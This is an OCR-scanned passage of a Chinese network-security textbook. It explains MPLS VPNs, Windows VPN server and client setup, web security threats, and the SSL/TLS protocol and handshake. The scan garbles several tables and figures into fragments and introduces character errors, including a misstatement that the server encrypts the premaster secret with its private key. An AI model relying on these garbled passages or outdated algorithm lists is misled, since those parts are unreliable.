多 协议 标签 交换 (Multi Protocol Label Switch, MPLS) 协 议 设计 的 目的 是 希望 利用 三 
层 以 太 网 交换 机 一 次 路 由 、 多 次 转发 的 思想 ,用 来 提高 路 由 器 的 转发 性 能 ,其 基本 的 原理 则 
是 在 报 文中 增加 一 个 TAG 字段 ,在 数据 报 文 经 过 的 路 径 上 的 设备 根据 该 标签 决定 下 一 步 
的 转发 方向 。 这 是 完全 不 同 于 传统 路 由 器 通过 查找 路 由 表 确 定数 据 报 文 下 一 步 转发 方向 的 
方法 ,路 径 上 的 路 由 转发 设备 需要 运行 LDP 标签 分 发 协议 ,来 相互 通知 对 不 同 TAG 的 处 
理 办 法 。 利 用 MPLS 协议 ,可 以 在 纯粹 的 IP 网 络 上 实现 虚拟 专用 网 络 ,但 是 此 虚拟 专用 网 
络 不 能 保证 用 户 数据 的 安全 性 。 

利用 MPLS 构建 的 VPN 网 络 需要 全 网 的 设备 都 支持 MPLS 协议 ,而 IPSec VPN 则 仅 
仅 需要 部 署 在 网 络 边缘 上 的 设备 具备 IPSec 协议 的 支持 即 可 ,从 这 一 点 上 来 看 ,IPSec VPN 
非常 适合 企业 用 户 在 公共 IP 网 络 上 构建 自己 的 虚拟 专用 网 络 ,而 MPLS 则 只 能 由 运营 商 
进行 统一 部 署 。 这 种 建立 VPN 的 方式 有 一 点 利用 IP 网 络 模拟 传统 的 DDN/FR 等 专线 网 
络 的 味道 ,因为 在 用 户 使 用 MPLS VPN 之 前 ,需要 网 络 运营 者 根据 用 户 的 需求 在 全 局 的 
MPLS 网 络 中 为 用 户 设 定 通道 。MPLS VPN 隧道 划分 的 原理 是 网 络 中 MPLS 路 由 器 利用 
数据 包 自 身 携带 的 通道 信息 来 对 数据 进行 转发 ,而 不 再 像 传统 的 路 由 器 那样 要 根据 IP 包 的 
地 址 信息 来 匹配 路 由 表 查 找 转发 路 径 。 这 种 做 法 可 以 减少 路 由 器 寻 址 的 时 间 ,而 且 能 够 实 
现 资源 预 留 保证 VPN 通道 的 服务 质量 。 

MPLS 本 身 不 能 提供 对 数据 的 安全 性 ,MPLS 协议 封装 的 数据 没有 经 过 任何 的 加 密 处 
理 , 仅 仅 是 在 报 文中 增加 一 个 TAG 标识 ,这 个 标识 被 路 由 设备 用 来 进行 数据 链 路 的 识别 和 
对 数据 的 快速 转发 。 

MPLS 更 适合 运营 商 部 署 ,而 不 适合 企业 用 户 自己 建设 ,运营 商 部 署 了 MPLS 网 络 之 
后 ,可 以 向 企业 用 户 提供 具有 服务 质量 保证 的 网 络 传输 服务 。 但 是 如 果 用 户 希 望 保障 自己 
的 数据 在 网 络 传输 中 的 安全 性 还 是 需要 借助 IPSec VPN 或 者 SSL VPN 来 实现 。 


5.2.3 ”VPN 安全 性 配置 


VPN(Virtual Private Network ,虚拟 专用 网 ) 是 穿越 专用 网 络 或 公用 网 络 的 、 安 全 的 、 
点 对 点 连接 的 网 络 。 

VPN 主要 由 下 面 4 部 分 构成 : 

(1) VPN 服务 器 。VPN 服务 器 用 于 接收 并 响应 VPN 客户 端的 连接 请 求 ,并 建立 
VPN 连接 。 它 可 以 是 专用 的 VPN 服务 器 设备 ,也 可 以 是 运行 VPN 服务 的 主机 。 

(2) VPN 客户 端 。VPN 客户 端 用 于 向 服务 器 发 起 连接 VPN 请 求 ,通常 为 VPN 连接 
组 件 主机 。 

(3) 隧道 协议 。VPN 的 实现 依赖 于 隧道 协议 ,通过 隧道 协议 ,可 以 将 一 种 协议 用 于 另 
一 种 协议 或 相同 协议 封装 ,同时 还 可 以 提供 加 密 、 认 证 服务 。 目 前 常用 的 隧道 协议 有 
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PPTP、L2TP 和 IPSec。 

VPN 客户 端 使 用 特定 的 隧道 协议 ,与 VPN 服务 器 建立 虚拟 连接 。 

(4) Internet 连接 。VPN 服务 器 和 客户 端 必 须 都 接 入 Internet, 并 且 通 过 Internet 能 够 
通信 。VPN 客户 端 使 用 VPN 连接 到 与 Internet 相连 的 VPN 服务 器 上 。VPN 服务 器 通过 
应 答 验 证 VPN 客户 端 身份 ,并 在 VPN 客户 端 和 内 部 网 络 之 间 传 送 数 据 。 

访问 VPN 服务 器 的 连接 过 程 分 为 下 面 5 个 步骤 : 

(1) 客户 端 通过 Internet 向 服务 器 连接 接口 发 送 VPN 连接 请 求 。 

(2) 服务 器 接收 到 客户 端 建立 连接 请 求 后 ,对 客户 端 进 行 验 证 。 

(3) 如 果 验 证 未 通过 , 则 拒绝 客户 端的 请 求 。 

(4) 如 果 身 份 验证 通过 , 则 允许 客户 端 连接 ,并 分 配 一 个 内 网 的 IP 地 址 。 

(5) 客户 端 将 获得 的 IP 地 址 与 VPN 连接 组 件 进行 绑 定 ,并 与 内 网 进行 通信 。 

1. VPN 服务 器 端 配置 

(1) 选择 “开始 ”|* 管 理工 具 ”|* 路 由 和 远程 访问 ”, 打 开 * 路 由 和 远程 访问 ”管理 控制 台 。 

(2) 在 左 侧 的 控制 台 树 中 右 击 计算 机 名 ,在 弹出 的 快捷 菜单 中 选择 “配置 并 启用 路 由 远 
程 访问 ”命令 ,打开 “路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 。 

(3) 单 击 * 下 一 步 ? 按 钮 ,进入 "添加 角色 和 功能 向 导 ” 界 面 , 如 图 5-9 所 示 。 

译 加 角色 和 功能 向 导 


选择 角色 服务 
服务 器 选择 
服务 器 和 角色。 | 角色 服务 


E 程 访问 
ee 务 NoDirectAccess 和 VPN(RAS) 
确认 3 路 由 


图 5-9 添加 角色 和 功能 向 导 


(4) 选择 “远程 访问 ”的 “角色 服务 ”选项 ,选中 “DirectAccess 和 VPN(RAS)” 复 选 框 。 

(5) 单 击 “ 下 一 步 ” 按 钮 ,进入 “IP 地 址 指定 ”界面 ,在 此 界面 中 选择 为 远程 访问 服务 的 客 
户 端 分 配 IP 地 址 的 方式 。 

(6) 选中 “来 自 一 个 指定 的 地 址 范围 " 复 选 框 ,然后 单 击 “ 下 一 步 ” 按 钮 ,进入 “地 址 范围 
指定 ?界面 ,在 此 界面 中 指定 IP 地 址 范围 。 

(7) 单 击 “ 新 建 " 按 钮 ,打开 “新 建 地 址 范围 "对话 框 ,在 此 对 话 框 中 输入 IP 地 址 。 

(8) 单 击 “ 确 定 ” 按 钮 ,返回 “地 址 范围 分 配 ” 界 面 ,可 以 查看 添加 的 IP 地 址 范围 。 

(9) 单 击 “ 下 一 步 ”按钮 ,在 出 现 的 界面 中 选择 是 否 使 用 指定 RADIUS 服务 器 。 

(10) 单 击 “ 下 一 步 ” 按 钮 ,进入 “完成 ”界面 , 单 击 “ 完 成 ”按钮 ,在 弹出 的 界面 单 击 “ 确 定 ” 
按钮 ,安装 完成 。 

(11) 设置 账号 的 拨 入 属性 。 

2. VPN 客户 端 配置 


在 客户 端 需要 创建 一 个 新 的 网 络 连 接 , 详 细 步 骤 如 下 : 








为 远程 访问 选择 要 安装 的 角色 服务 
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(1) 选择 “开始 ”|“ 控 制 面板 ”|“ 网 络 和 共享 中 心 ” 对 话 框 。 选 择 “ 设 置 连接 或 网 络 ”, 弹 
出 一 个 “选择 一 个 连接 选项 ”界面 ,选择 “连接 到 工作 区 ”, 单 击 “ 下 一 步 ” 按 钮 进入 “连接 到 工 
作 区 ”界面 。 

(2) 单 击 “ 使 用 我 的 Internet 连接 (VPN)(D” 进 入 “连接 之 前 ”界面 。 在 此 选择 连接 到 
Internet 的 方式 (默认 选择 “宽带 连接 ”), 单 击 “ 下 一 步 ” 按 钮 ,进入 “输入 要 连接 的 Internet 
地 址 ”界面 ,输入 Internet 地 址 (connection. contoso. com) 和 目标 名 称 (Connection. vpn) 并 
选择 “现在 不 连接 ; 仅 进 行 设置 以 便 稍 后 使 用 此 连接 ” 复 选 框 。 

(3) 单 击 “ 下 一 步 ” 按 钮 ,进入 “输入 您 的 用 户 名 和 密码 ”窗口 ,输入 用 户 名 
(Cadministrator) 及 密码 (此 时 的 用 户 名 就 是 前 面 章节 域 管理 员 的 名 字 , 实 际 应 用 中 请 尽量 不 
要 使 用 ) 。 

(4) 单 击 “ 创 建 ”按钮 , 稍 后 会 进入 “连接 已 可 以 使 用 ”界面 , 单 击 “ 关 闭 ” 按 钮 。 

(5) 单 击 “ 下 一 步 ” 按 钮 ,进入 “VPN 服务 器 选择 界面 ,在 此 输入 VPN 服务 器 的 服务 器 
名 或 者 是 IP 地 址 (192. 168. 1. 1)。 

(6) 单 击 “ 下 一 步 ” 按 钮 ,进入 “完成 "界面 , 单 击 “ 完 成 ” 按 ”- 语 加 上 用 网 络 
钮 ,弹出 “连接 "对话 框 ,输入 用 户 名 和 密码 进行 连接 。 连 接 成 功 加 er" 

后 ,如 图 单 5-10 所 示 。 

(7) 使 用 ipconfig/all 查看 连接 ,结果 如 下 : 图 5-10 ”连接 成 功 界面 

PPP adapter 虚拟 专用 网 络 连 接 。 


Connection - specific DNS Suffix . : 







Description.........: WAN (PPP/SLIP) Interface 
Physical Address......... 00-53-45-00-00-00 
Dhcp Enabled......... :No 

IP Address.... 192.168.1.5 








Subnet Mask......... : 255.255.255.255 
Default Gateway. 192.168.1.5 
DNS Servers......... : 192.168.1.1 
4 
5.3 Web 安全 


Web 技术 是 Internet 最 具 活 力 和 发 展 潜力 的 技术 , 它 广泛 应 用 于 商业 、 教 育 和 娱乐 等 领 
域 。Internet 中 信息 的 互联 性 、 开 放 性 和 交互 性 给 信息 社会 的 信息 共享 带 来 了 极 大 便利 ,但 同 
时 也 带 来 了 严重 的 安全 问题 。Web 是 一 个 运行 于 Internet 和 TCP/IP 内 联网 上 的 客户 /服务 
器 应 用 程序 ,因此 也 成 为 黑客 攻击 的 主要 对 象 以 及 攻 入 系统 主机 的 主要 通道 之 一 。Web 的 安 
全 性 涉及 整个 Internet 的 安全 , 它 面临 着 许多 新 的 挑战 : Web 具有 双向 的 修改 特性 , Web 服务 
器 容易 遭受 来 自 Internet 的 攻击 ; 实现 Web 浏览 .配置 管理 和 内 容 发 布 等 功能 的 软件 异常 复 
杂 , 其 中 通常 隐藏 了 许多 潜在 的 安全 隐患 ; Web 通常 是 一 个 公司 或 机 构 的 公告 板 , 如 果 Web 
服务 器 遭受 破坏 , 则 可 能 损害 公司 或 机 构 的 声誉 , 带 来 经 济 损失 ; 同时 Web 服务 器 常常 和 其 他 
计算 机 系统 联系 在 一 起 ,因此 一 旦 Web 服务 器 被 攻破 ,可 能 玖 及 与 它 相连 的 其 他 系统 ， Web 
用 户 往往 是 未 经 训练 的 ,对 安全 风险 没有 意识 ,更 没有 足够 的 防范 工具 和 知识 。 
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目前 ,来 自 Internet 上 的 安全 问题 主要 分 两 大 类 : 主动 攻击 和 被 动 攻击 。 主 动 攻击 是 
指 攻击 者 通过 选择 性 地 修改 删除、 延迟 . 乱 序 、 复 制 . 插 入 数据 流 或 数据 流 的 一 部 分 以 达到 
其 非法 的 目的 。 主 动 攻击 可 归纳 为 中 断 、 自 改 、 伪 造 3 种 。 被 动 攻击 主要 是 攻击 者 监听 网 络 
上 传递 的 信息 流 , 从 而 获取 信息 的 内 容 , 或 仅仅 希望 得 到 信息 流 的 长 度 、 传 输 频率 等 数据 。 
这 两 种 攻击 方法 是 互补 的 ,也 就 是 说 ,被 动 攻 击 往往 很 难 检测 但 相对 容易 预防 ,而 主动 攻击 
很 难 预防 却 相 对 容易 检测 。 表 5-1 给 出 了 Web 安全 威胁 与 对 策 。 


表 5-1 Web 安全 威胁 与 对 策 























数据 特性 威胁 后 果 对 策 
5 ee 

完整 性 2 机 器 暴露 加 密 校 验 和 

亚 

RN 易 受 到 其 他 危险 的 攻击 
网 上 窃听 
窃取 网 络 配置 信息 

保密 性 从 服务 器 处 窃取 信息 和 加 密 ,Web 代理 
从 客户 端 处 窃取 信息 
窃取 客户 机 与 服务 器 连接 的 信息 
Pg 中 类 

拒绝 服务 骚扰 难以 防范 
用 伪 请 求 海 没 服务 器 
占 满 硬盘 或 耗 尽 内存 纪 

数据 仿造 以 候 乱 页 

冒充 合法 用 户 误 信 错 误 信息 人 


5.3.1 Web 安全 实现 方法 


实现 Web 安全 的 方法 很 多 ,从 TCP/IP 协议 的 角度 可 以 分 成 3 种 ,分 别 是 网 络 层 安全 
性 、 传 输 层 安 全 性 和 应 用 层 安全 性 。 

1. 网 络 层 实现 Web 安全 

传统 的 安全 体系 一 般 都 建立 在 应 用 层 上 。 这 些 安全 体系 虽然 具有 一 定 的 可 行 性 ,但 也 
存在 着 巨大 的 安全 隐患 ,因为 IP 包 本 身 不 具备 任何 安全 特性 ,很 容易 被 修改 伪造 、 查 看 和 
重播 。IPSec 可 提供 端 到 端的 安全 性 机 制 ,可 在 网 络 层 上 对 数据 包 进 行 安全 处 理 。IPSec 支 
持 数据 加 密 ,同时 确保 资料 的 完整 性 。 各 种 应 用 程序 可 以 享有 IPSec 提供 的 安全 服务 和 密 
钥 管理 ,而 不 必 设计 和 实现 自己 的 安全 机 制 , 因 此 减少 了 协商 密 钥 的 开销 ,也 降低 了 产生 安 
全 漏洞 的 可 能 性 。IPSec 可 以 在 路 由 器 .防火 墙 . 主 机 和 通信 链 路 上 配置 ,实现 端 到 端的 安 
全 虚拟 专用 网 络 和 安全 隧道 技术 等 。 基 于 网 络 层 使 用 IPSec 来 实现 Web 安全 的 模型 ,如 
图 5-11 所 示 。 

2. 传输 层 实现 Web 安全 

在 TCP 传输 层 之 上 实现 数据 的 安全 传输 是 另 一 种 安全 解决 方案 ,安全 套 接 层 SSL 和 
TLS(Transport Layer Security) 通 常 工 作 在 TCP 层 之 上 ,可 以 为 更 高 层 协 议 提 供 安 全 服 
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务 。 其 结构 如 图 5-12 所 示 。 
HTTP | TELNET | SMTP | FTP 
HTTP |TELNET| SMTP | FTP Li Ti 
TCP/UDP TCP 
1P/IPSec IP 
图 5-11 基于 网 络 层 实现 Web 安全 图 5-12 基于 传输 层 实现 Web 安全 
3. 应 用 层 实 现 Web 安全 
S/MINE| PGP | SET 
将 安全 服务 直接 嵌 和 人 在 应 用 程序 中 ,从 而 在 应 用 层 
实现 通信 安全 ,如 图 5-13 所 示 。SET(Secure Electronic er SMIP Hoe 
Transaction, 安 全 电子 交易 ) 是 一 种 安全 交易 协议 ,S/ UDP TCP 
MIME、PGP 是 用 于 安全 电子 邮件 的 一 种 标准 。 它 们 都 IP 











可 以 在 相应 的 应 用 中 提供 机 密 性 、 完 整 性 和 不 可 抵赖 性 
等 安全 服务 。 


5.3.2 SSL 协议 


图 5-13 ”基于 应 用 层 实现 Web 安全 


1. SSL 协议 的 基本 概念 

SSL 协议 被 广泛 用 于 Internet 上 的 安全 传输 .身份 认证 等 。 现 行 的 Web 浏览 器 普遍 将 
HTTP 和 SSL 相 结合 ,从 而 实现 Web 服务 器 和 客户 端 浏 览 器 之 间 的 安全 通信 。 

SSL 工作 在 TCP 层 之 上 ,可 为 高 层 协议 (如 HTTP、FTP 以 及 TELNET 等 ) 提 供 安 全 
服务 。SSL 提供 的 安全 服务 采用 了 公 钥 机 制 对 Web 服务 器 和 客户 机 (可 选 ) 的 通信 提供 保 
密 性 ,数据 完整 性 和 认证 。 在 建立 连接 过 程 中 采用 非 对 称 密 钥 ,在 会 话 过 程 中 使 用 对 称 密 
钥 。 加 密 的 类 型 和 强度 则 在 两 端 建立 连接 的 过 程 中 协商 决定 。SSL 协议 在 应 用 层 协议 通 
信之 前 就 已 经 完成 了 加 密 算法 、 通 信和 密 钥 的 协商 以 及 服务 器 认证 工作 。 在 此 之 后 应 用 层 协 
议 所 传送 的 数据 都 会 被 加 密 , 从 而 保证 通信 的 私密 性 。 

SSL 提供 3 种 标准 服务 : 信息 保密 、 数 据 完整 性 和 双向 认证 ,如 表 5-2 所 示 。 








表 5-2 SSL 提供 的 3 种 标准 服务 
安全 服务 主要 技术 作 用 
保密 性 加 密 防止 窃听 
数据 完整 性 数据 认证 编码 防止 破坏 
双向 认证 x. 50g 防止 欺骗 











(1) 保密 性 。 通 过 使 用 非 对 称 密 钥 和 对 称 密 钥 技术 达到 数据 保密 。 对 称 密 钥 算 法 的 速 
度 比 非 对 称 密 钥 算法 的 速度 快 ,在 SSL 中 利用 了 这 两 种 加 密 算法 , 既 提 供 了 保密 性 ,又 提高 
了 通信 效率 。 

发 送 方 发 送信 息 时 的 步骤 如 下 : 

中 产生 一 个 随机 数 , 即 对 称 密 钥 ,接着 用 它 对 发 送 的 明文 信息 进行 加 密 。 
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@ 用 接收 方 的 公开 密 钥 对 随机 数 进行 加 密 。 

@ 接收 方 用 自己 的 私 钥 对 随机 数 进行 解密 。 

@ 再 用 随机 数 对 信息 进行 解密 。 

SSL 服务 器 与 SSL 客户 机 之 间 的 所 有 业务 , 均 使 用 在 握手 过 程 中 建立 的 密 钥 和 算法 进 
行 加 密 , 这 样 ,就 可 以 防止 某 些 用 户 通 过 使 用 监听 工具 进行 非法 窃听 了 。 

(2) 数据 完整 性 。 确 保 SSL 业务 全 部 到 达 目 的 地 ,SSL 利用 机 密 共享 和 Hash 函数 组 
提供 数据 完整 性 服务 。 

(3) 双向 认证 。 客 户 机 与 服务 器 相互 识别 ,它们 的 标识 号 用 公开 密 钥 编码 ,并 在 SSL 握 
手 时 交换 各 自 的 标识 号 。 最 新 版 本 的 SSL, 除 了 支持 认证 、 可 靠 性 通信 和 完整 性 外 ,还 有 下 
面 几 个 特点 : 

@ 建立 SSL 会 话 的 速度 快 。 

@ 支持 密 钥 传送 算法 。 

@ 支持 Fortezza 卡 式 的 硬件 令 牌 。 

@ 改善 了 证 书 认 证 机 制 ,Server 可 以 定义 可 信 证 书 发 证 机 构 表 。 

2. SSL 协议 的 构成 

SSL 协议 的 目标 就 是 在 通信 双方 利用 加 密 的 SSL 信道 建立 安全 的 连接 。 它 不 是 一 个 
单独 的 协议 ,而 是 两 层 协议 ,其 结构 如 图 5-14 所 示 。SSL 底层 是 SSL 记录 协议 ,顶层 是 SSL 
握手 协议 .SSL 更 改 密码 规格 协议 和 SSL 警告 协议 。 





SSL 更 改 密码 
规格 协议 


SSL 记 录 协 议 








SSL 担 手 协议 SSL 和 警告 协议 | HTTP 








TCP 


IP 











图 5-14 SSL 协议 栈 


1) SSL 记录 协议 

SSL 记录 协议 为 SSL 连接 提供 两 种 服务 : 机 密 性 和 报 文 完整 性 。 在 SSL 协议 中 ,所 
有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 长 度 不 为 0 的 记录 数据 组 成 的 。 所 
有 的 SSL 通信 都 使 用 SSL 记录 层 , 记 录 协 议 封装 上 层 的 握手 协议 、 警 告 协议 ,改变 密码 格 
式 协 议和 应 用 数据 协议 。SSL 记录 协议 包括 了 记录 头 和 记录 数据 格式 的 规定 。SSL 记录 
协议 定义 了 要 传输 数据 的 格式 , 它 位 于 一 些 可 靠 的 传输 协议 之 上 (如 TCP) ,用 于 各 种 更 
高 层 协议 的 封装 ,记录 协议 主要 完成 分 组 和 组 合 、 压 缩 和 解压 缩 以 及 消息 认证 和 加 密 等 
功能 。 

2) SSL 更 改 密码 规格 协议 

此 协议 用 于 改变 安全 策略 。 改 变 密码 报 文 由 客户 机 或 服务 器 发 送 , 用 于 通知 对 方 后 续 
的 记录 将 采用 新 的 密码 列表 。 

3) SSL 警告 协议 

警告 消息 传达 消息 的 严重 性 并 描述 警告 。 一 个 致命 的 警告 将 立即 终止 连接 。 与 其 他 消 


第 5 章 IP 安全 与 Web 安全 195 





息 一 样 ,警告 消息 在 当前 状态 下 被 加 密 和 压缩 。 警 告 消息 有 以 下 几 种 : 关闭 通知 消息 、 意 外 
消息 .错误 记录 MAC 消息 、 解 压 失 败 消息 ,握手 失 败 消息 、 无 证 书 消息 、 错 误 证 书 消息 不 支 
持 的 证 书 消息 、 证 书 撤回 消息 .证 书 过 期 消息 .证书 未 知 和 参数 非法 消息 等 。 

4) SSL 握手 协议 

SSL 握手 协议 是 用 来 在 客户 端 和 服务 器 端 传输 应 用 数据 而 建立 的 安全 通信 机 制 ,具体 
实现 以 下 功能 : 

。 在 客户 端 验证 服务 器 ,SSL 协议 采用 公 钥 方式 进行 身份 认证 。 

。 在 服务 器 端 验证 客户 (可 选 的 ) 。 

。 客户 端 和 服务 器 之 间 协 商 双 方 都 支持 的 加 密 算法 和 压缩 算法 ,可 选用 的 加 密 算法 包 

括 IDEA、RC4、DES、3DES、RSA、DSS,Fortezza、MD5 和 SHA 等 。 

。 产生 对 称 加 密 算法 的 会 话 密 钥 。 

。 建立 加 密 SSL 连接 。 

SSL 协议 同时 使 用 对 称 密 钥 算法 和 公 钥 加 密 算法 。 前 者 在 速度 上 比 后 者 要 快 很 多 ,但 
是 后 者 可 以 实现 更 好 的 安全 验证 。 一 个 SSL 传输 过 程 需要 先 握手 : 用 公 钥 加 密 算法 使 服务 
器 端 在 客户 端 得 到 验证 ,以 后 就 可 以 使 双方 用 商议 成 功 的 对 称 密 钥 来 更 快速 地 加 密 、 解 密 
数据 。 

握手 过 程 具体 描述 如 下 : 

(1) 客户 端 向 服务 器 端 发 送 客 户 端 SSL 版 本 号 .加密 算法 设置 .随机 产生 的 数据 和 其 他 
服务 器 需要 用 于 同 客户 端 通信 的 数据 。 

(2) 服务 器 向 客户 端 发 送 服务 器 的 SSL 版 本 号 .加密 算法 设置 .随机 产生 的 数据 和 其 他 
客户 端 需要 用 于 同 服务 器 通信 的 数据 。 另 外 ,服务 器 还 要 发 送 自己 的 证 书 , 如 果 客 户 端正 在 
请 求 需要 认证 的 信息 ,那么 服务 器 同时 也 要 请 求 获得 客户 端的 证 书 。 

(3) 客户 端 用 服务 器 发 送 的 信息 验证 服务 器 身份 。 如 果 认 证 不 成 功 , 用 户 就 将 得 到 一 
个 警告 ,然后 加 密 数据 连接 将 无 法 建立 。 如 果 成 功 , 则 继续 下 一 步 。 

(4) 用 户 用 握手 过 程 至 当前 产生 的 所 有 数据 ,创建 连接 所 用 的 Premaster Secret, 用 服 
务 器 的 公 钥 加 密 [在 第 (2) 步 中 传送 的 服务 器 证 书 中 得 到 ] ,传送 给 服务 器 。 

(5) 如 果 服 务 器 也 请 求 客户 端 验 证 ,那么 客户 端 将 对 另外 一 份 不 同 于 上 次 用 于 建立 加 
密 连接 使 用 的 数据 进行 签名 。 在 这 种 情况 下 ,客户 端 会 把 这 次 产生 的 加 密 数 据 和 自己 的 证 
书 同时 传送 给 服务 器 用 来 产生 Premaster Secret。 

(6) 如 果 服 务 器 也 请 求 客户 端 验证 ,服务 器 将 试图 验证 客户 端 身份 。 如 果 客 户 端 不 能 
获得 认证 ,连接 将 被 中 止 。 如 果 被 成 功 认 证 ,服务 器 用 自己 的 私 钥 加 密 Premaster Secret, 然 
后 执行 一 系列 步骤 产生 Master Secret。 

(7) 服务 器 和 客户 端 同时 产生 Session Key, 之 后 的 所 有 数据 传输 都 用 对 称 密 钥 算法 来 
交换 数据 。 

(8) 客户 端 向 服务 器 发 送信 息 说 明 以 后 的 所 有 信息 都 将 用 Session Key 加 密 。 至 此 , 它 
会 传送 一 个 单独 的 信息 标示 客户 端的 握手 部 分 已 经 宣告 结束 。 

(9) 服务 器 也 向 客户 端 发 送信 息 说 明 以 后 的 所 有 信息 都 将 用 Session Key 加 密 。 至 此 ， 
它 会 传送 一 个 单独 的 信息 表示 服务 器 端的 握手 部 分 已 经 宣告 结束 。 

(10) SSL 握手 过 程 成 功 结束 ,一 个 SSL 数据 传送 过 程 建立 。 客 户 端 和 服务 器 开始 用 
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Session Key 加 密 、 解 密 双方 交互 的 所 有 数据 。 

一 个 SSL 传输 过 程 大 致 就 是 这 样 ,但 是 很 重要 的 一 点 不 要 忽略 : 利用 证 书 在 客户 端 和 
服务 器 端 进行 的 身份 验证 过 程 。 

一 个 支持 SSL 的 客户 端 软件 通过 下 列 步骤 认证 服务 器 的 身份 : 

(1) 从 服务 器 端 传送 的 证 书 中 获得 相关 信息 。 

(2) 判断 当天 的 时 间 是 否 在 证 书 的 合法 期 限 内 。 

(3) 确认 签发 证 书 的 机 关 是 否 是 客户 端 信任 的 。 

(4) 确认 签发 证 书 的 公 钥 是 否 符合 签发 者 的 数字 签名 。 

(5) 确认 证 书 中 的 服务 器 域名 是 否 符合 服务 器 自己 真正 的 域名 。 

(6) 服务 器 被 验证 成 功 ,客户 继续 进行 握手 过 程 。 

一 个 支持 SSL 的 服务 器 通过 下 列 步骤 认证 客户 端的 身份 : 

(1) 从 客户 端 传送 的 证 书 中 获得 相关 信息 。 

(2) 判断 用 户 的 公 钥 是 否 符 合用 户 的 数字 签名 。 

(3) 判断 当天 的 时 间 是 否 在 证 书 的 合法 期 限 内 。 

(4) 确认 签发 证 书 的 机 关 是 否 是 服务 器 信任 的 。 

(5) 确认 用 户 的 证 书 是 否 被 列 在 服务 器 的 LDAP 里 用 户 的 信息 中 。 

(6) 得 到 验证 的 用 户 是 否 仍然 有 权限 访问 请 求 的 服务 器 资源 。 

SSL/TLS 协议 的 基本 思路 是 采用 公 钥 加 密 法 .也 就 是 说 ,客户 端 先 向 服务 器 端 索 要 公 
钥 , 然 后 用 公 钥 加 密 信息 ,服务 器 收 到 密 文 后 ,用 自己 的 私 钥 解 密 。 

但 是 ,这 里 有 两 个 问题 。 

(1) 如 何 保证 公 钥 不 被 算 改 ? 解决 方法 : 将 公 钥 放 在 数字 证 书 中 。 只 要 证 书 是 可 信 
的 , 公 钥 就 是 可 信 的 。 

(2) 公 钥 加 密 计算 量 太 大 ,如 何 减少 耗 用 的 时 间 ? 解决 方法 : 每 一 次 对 话 (session) , 客 
户 端 和 服务 器 端 都 生成 一 个 "对话 密 钥 ”(session key) ,用 它 来 加 密 信息 。 由 于 “对 话 密 钥 ” 
是 对 称 加 密 ,所 以 运算 速度 非常 快 ,而 服务 器 公 钥 只 用 于 加 密 “ 对 话 密 钥 本身, 这 样 就 减少 
了 加 密 运 算 的 消耗 时 间 。 

因此 ,SSL/TLS 协议 的 基本 过 程 如 下 : 

(1) 客户 端 向 服务 器 端 索 要 并 验证 公 钥 。 

(2) 双方 协商 生成 “对 话 密 钥 ”。 

(3) 双方 采用 "对 话 密 钥 进行 加 密 通 信 。 

上 面 过 程 的 前 两 步 , 又 称 为 “握手 阶段 ”(handshake)。 

3. 握手 阶段 的 4 次 通信 

握手 阶段 的 详细 过 程 如 图 5-15 所 示 。 

握手 阶段 涉及 4 次 通信 ,下 面 逐 一 介绍 。 需 要 注意 的 是 ,握手 阶段 的 所 有 通信 都 是 明文 的 。 

1) 第 一 次 通信 : 客户 端 发 出 请 求 (Client Hello) 

首先 ,客户 端 (通常 是 浏览 器 ) 先 向 服务 器 发 出 加 密 通 信 的 请 求 , 这 被 叫做 Client Hello 
请 求 。 在 这 一 步 ,客户 端 主要 向 服务 器 提供 以 下 信息 。 

(1) 支持 的 协议 版 本 ,比如 TLS 1.0 版。 

(2) 一 个 客户 端 生 成 的 随机 数 , 稍 后 用 于 生成 :“ 对 话 密 钥 ”。 
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发 出 加 密 通 信 请 求 


服务 器 同意 加 密 通 信 人 


服务 器 数字 证 书 
密 钥 协商 
请 求 客户 端 数字 证 书 
服务 器 应 答 结 








客户 端 数 字 证 书 
用 服务 器 公 钥 加 密 的 本 次 会 话 密 钥 
服务 器 数字 证 书 验证 
使 用 本 次 会 话 密 钥 加 密 的 数据 
客户 端 握手 结束 





使 用 本 次 会 话 密 钥 加 密 的 数据 
服务 器 握手 结束 





TLS 的 4 次 握手 结束 ， 使 用 本 次 会 话 密 钥 
加 密 数 据 进行 双向 通信 








图 5-15 握手 阶段 


(3) 支持 的 加 密 方法 ,比如 RSA 公 钥 加 密 。 

(4) 支持 的 压缩 方法 。 

这 里 需要 注意 的 是 ,客户 端 发 送 的 信息 之 中 不 包括 服务 器 的 域名 。 也 就 是 说 ,理论 上 服 
务 器 只 能 包含 一 个 网 站 ,否则 会 分 不 清 应 该 向 客户 端 提供 哪 一 个 网 站 的 数字 证 书 。 这 就 是 
为 什么 通常 一 台 服 务 器 只 能 有 一 张 数 字 证 书 的 原因 。 

对 于 虚拟 主机 的 用 户 来 说 ,这 当然 很 不 方便 。2006 年 ,TLS 协议 加 入 了 一 个 Server 
Name Indication 扩展 ,允许 客户 端 向 服务 器 提供 它 所 请 求 的 域名 。 

2) 第 二 次 通信 : 服务 器 应 答 (Server Hello) 

服务 器 收 到 客户 端 请 求 后 ,向 客户 端 发 出 应 答 ,这 叫做 Server Hello。 服 务 器 的 应 答 包 
含 以 下 内 容 。 

(1) 确认 使 用 的 加 密 通 信和 协议 版 本 ,比如 TLS 1.0 版本。 如果 浏览 器 与 服务 器 支持 的 
版 本 不 一 致 ,服务 器 关闭 加 密 通 信 。 

(2) 一 个 服务 器 生成 的 随机 数 , 稍 后 用 于 生成 “对 话 密 钥 ”。 

(3) 确认 使 用 的 加 密 方 法 ,比如 RSA 公 钥 加 密 。 

(4) 服务 器 证 书 。 

除了 上 面 这 些 信息 ,如 果 服 务 器 需要 确认 客户 端的 身份 ,就 会 再 包含 一 项 请 求 ,要 求 客 
户 端 提供 “客户 端 证 书 ”。 比 如 ,金融 机 构 往往 只 允许 认证 客户 联 入 自己 的 网 络 , 会 向 正式 客 
户 提供 USB 密 钥 ,里 面 就 包含 了 一 张 客户 端 证 书 。 

3) 第 三 次 通信 : 客户 端 应 答 

客户 端 收 到 服务 器 应 答 以 后 ,首先 验证 服务 器 证 书 。 如 果 证 书 不 是 可 信 机 构 颂 布 或 者 
证 书 中 的 域名 与 实际 域名 不 一 致 , 或 者 证 书 已 经 过 期 ,就 会 向 访问 者 显示 一 个 警告 ,由 其 选 
择 是 否 还 要 继续 通信 。 
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如 果 证 书 没有 问题 ,客户 端 就 会 从 证 书 中 取出 服务 器 的 公 钥 。 然 后 ,向 服务 器 发 送 下 面 
3 项 信息 。 

